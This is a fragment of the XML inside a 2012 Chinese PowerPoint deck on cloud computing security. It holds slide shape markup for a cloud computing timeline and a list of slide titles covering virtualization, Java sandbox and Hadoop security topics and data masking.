          <a:xfrm>
            <a:off x="3995936" y="2132856"/>
            <a:ext cx="2448272" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60012"/>
              <a:gd name="adj2" fmla="val 7709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1961,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麦肯锡</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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5" name="椭圆形标注 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627784" y="3645024"/>
            <a:ext cx="2808312" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60012"/>
              <a:gd name="adj2" fmla="val 7709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1990’S,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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Ian Foster</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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6" name="椭圆形标注 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267744" y="5157192"/>
            <a:ext cx="2448272" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60012"/>
              <a:gd name="adj2" fmla="val 7709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2006,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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Amazon </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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051720" y="332656"/>
            <a:ext cx="52609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云计算的使命</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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1556792"/>
            <a:ext cx="3117096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556792"/>
            <a:ext cx="3024336" cy="433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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="右箭头 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707904" y="2924944"/>
            <a:ext cx="1872208" cy="1512168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59632" y="2852936"/>
            <a:ext cx="63411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44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Computing as Utility</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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</TotalTime>
  <Words>714</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>166</Paragraphs>
  <Slides>39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深入浅出云计算安全</vt:lpstr>
      <vt:lpstr>Who am I?</vt:lpstr>
      <vt:lpstr>icloud是云吗？</vt:lpstr>
      <vt:lpstr>互联网未来的入口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虚拟化技术安全问题</vt:lpstr>
      <vt:lpstr>XEN的DOS</vt:lpstr>
      <vt:lpstr>AppEngine的环境安全</vt:lpstr>
      <vt:lpstr>CVE-2012-0507</vt:lpstr>
      <vt:lpstr>幻灯片 21</vt:lpstr>
      <vt:lpstr>突破java sandbox</vt:lpstr>
      <vt:lpstr>弹性计算的网络安全</vt:lpstr>
      <vt:lpstr>幻灯片 24</vt:lpstr>
      <vt:lpstr>幻灯片 25</vt:lpstr>
      <vt:lpstr>幻灯片 26</vt:lpstr>
      <vt:lpstr>互联网公司使用hadoop的方式</vt:lpstr>
      <vt:lpstr>共享”gateway”的问题</vt:lpstr>
      <vt:lpstr>Hacking Hadoop</vt:lpstr>
      <vt:lpstr>Map-Reduce job/UDF</vt:lpstr>
      <vt:lpstr>幻灯片 31</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>幻灯片 33</vt:lpstr>
      <vt:lpstr>如何解决隐私问题？</vt:lpstr>
      <vt:lpstr>Data Masking</vt:lpstr>
      <vt:lpstr>保留统计信息，掩盖个人信息</vt:lpstr>
      <vt:lpstr>总结</vt:lpstr>
      <vt:lpstr>Question? 联系我</vt:lpstr>
      <vt:lpstr>幻灯片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深入浅出云计算安全</dc:title>
  <dc:creator>吴翰清</dc:creator>
  <cp:lastModifiedBy>hanqin.wuhq</cp:lastModifiedBy>
  <cp:revision>88</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-07-02T06:30:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-07-20T16:23:19Z</dcterms:modified>
</cp:coreProperties>
</file>